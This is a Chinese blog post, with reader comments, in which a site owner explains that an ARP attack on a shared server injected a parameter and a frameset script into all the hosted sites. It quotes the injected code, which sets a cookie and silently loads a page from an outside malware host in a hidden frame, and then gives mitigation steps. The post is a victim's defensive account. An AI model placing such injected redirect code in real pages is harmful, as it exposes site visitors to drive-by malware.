?UpdatedPage=aGlqYWNr

2011年2月3日 发表评论 阅读评论

最近出现一种新的ARP病毒,一个服务器上的所有网站网址都会被挂马,通常是除主页外的所有页面url都被强制加上了?UpdatedPage=aGlqYWNr,表现为查看网页的源文件会看到以下代码:

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://j857i.3322.org:6677/m/index.html";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/?UpdatedPage=aGlqYWNr">
<frame name="hi" src="">
</frameset>
</html>

注意:其中的“http://j857i.3322.org:6677/m/index.html”可能是其它类似的网址。

开始我也以为是自己的站被黑了,把所有文件都查了一次,折腾了半天都没发现。

后来发现同一个服务器的其他站都有这个问题,一开始还以为是机房加了防火墙,后来问了机房管理员才知道,是同一个局域网内有别的其他服务器中了ARP。

临时解决方法
请在服务器上装一个360安全卫士,并把ARP防御打开,最关键的,要把ARP防御设置为始终启用,防御速度:6秒。一定不能用自动防御,记住!!!
弄完了重启一遍。

最终的解决办法只能等机房管理员把那台问题服务器揪出来了。如果你放服务器的IDC水平不够就会经常遇到这种事,如果机房效率高一下解决,如果垃圾要很久,我的网站1天才搞好,导致网站被360googlepin蔽,google效率高申请就接触,360会强制在他的360pin蔽你的网站,而且只是为了推广自己的监控功能,只有你注册了才能解除,而且效率很底,我的用了1个星期才正常。


转载请注明来自:[闪电博客]http://shandian.biz/251.html

分类: 建站教程 标签:
  1. Winson
    2011年2月3日22:05 | #1

    嗯,我试过网站被加上了iframe病毒,总是会不知不觉添加了另外网站的链接!

    最后也祝博主新年快乐啦!

  2. 博客之家
    2011年2月3日22:58 | #2

    博主新年快乐。

  3. 闪电博客
    2011年2月3日23:44 | #3

    楼上两个祝福你们!